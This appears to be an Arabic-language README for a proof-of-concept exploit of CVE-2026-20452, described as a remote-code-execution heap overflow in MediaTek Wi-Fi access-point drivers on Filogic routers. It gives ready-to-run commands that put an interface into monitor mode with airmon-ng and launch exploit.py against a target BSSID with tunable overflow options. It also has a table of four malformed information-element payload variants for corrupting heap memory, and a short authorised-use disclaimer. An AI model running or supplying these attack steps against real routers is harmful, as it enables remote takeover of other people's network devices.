
استغلال لإثبات المفهوم لـ CVE-2026-20452، وهو تجاوز سعة المخزن المؤقت في كومة الذاكرة (heap-based buffer overflow) في برامج تشغيل نقاط الوصول اللاسلكية من MediaTek. يستخدم scapy لإرسال إطارات إدارة Wi-Fi مصممة خصيصًا لتحفيز تنفيذ التعليمات البرمجية عن بُعد على أجهزة التوجيه Filogic المتأثرة.
إثبات مفهوم لثغرة CVE-2026-20452، وهي تجاوز سعة المخزن المؤقت في الكومة في برنامج تشغيل نقطة الوصول اللاسلكية (WLAN AP) من MediaTek.
https://www.hunt-benito.com/blog/mediatek-wlan-heap-overflow-cve-2026-20452-filogic-router-rce/
pip install scapy)sudo airmon-ng check kill
sudo airmon-ng start wlan0
# تصبح الواجهة wlan0mon
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66 \
--overflow-size 1024 --variant 2 --count 50 --delay 0.05
هذه الأداة مقدمة لأغراض البحث الأمني المصرح به والتعليم فقط. قد يتطلب الإرسال على ترددات Wi-Fi تصريحًا قانونيًا في منطقتك. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني. لا يتحمل المؤلفون أي مسؤولية ولا يتحملون أي عواقب نتيجة سوء الاستخدام أو الضرر الناتج عن هذه الأداة.
| المتغير | نوع IE | الوصف |
|---|
| 0 | Vendor Specific (221) | IE واحد كبير جدًا مع OUI 00:50:43 |
| 1 | Chained Vendor IEs | عدة IEs صغيرة لإتلاف كائنات الكومة المجاورة |
| 2 | HT Capabilities (45) | IE HT Capabilities كبير جدًا |
| 3 | Extended Capabilities (127) | IE Extended Capabilities كبير جدًا |